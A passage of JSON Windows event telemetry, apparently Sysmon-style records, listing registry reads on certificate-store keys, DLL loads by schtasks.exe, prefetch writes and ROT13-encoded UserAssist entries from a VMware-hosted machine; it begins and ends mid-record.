"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "schtasks.exe", - "image_path": "C:\\Windows\\System32\\schtasks.exe", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805420000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "taskschd.dll", - "image_path": "C:\\Windows\\System32\\taskschd.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805259984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573849650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573849650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573849650000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C", - "registry_value": "W32:000000000009053C", - "timestamp": 131883573875900000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883573875900000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "SVCHOST.EXE-E3F19127.pf", - "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-E3F19127.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573894960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573905270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573905270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573905270000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883573905730000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573905730000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573906670000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573906820000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883573906980000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883573906980000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "SCHTASKS.EXE-2DE769BF.pf", - "file_path": "C:\\Windows\\Prefetch\\SCHTASKS.EXE-2DE769BF.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573907300000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573938540000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": 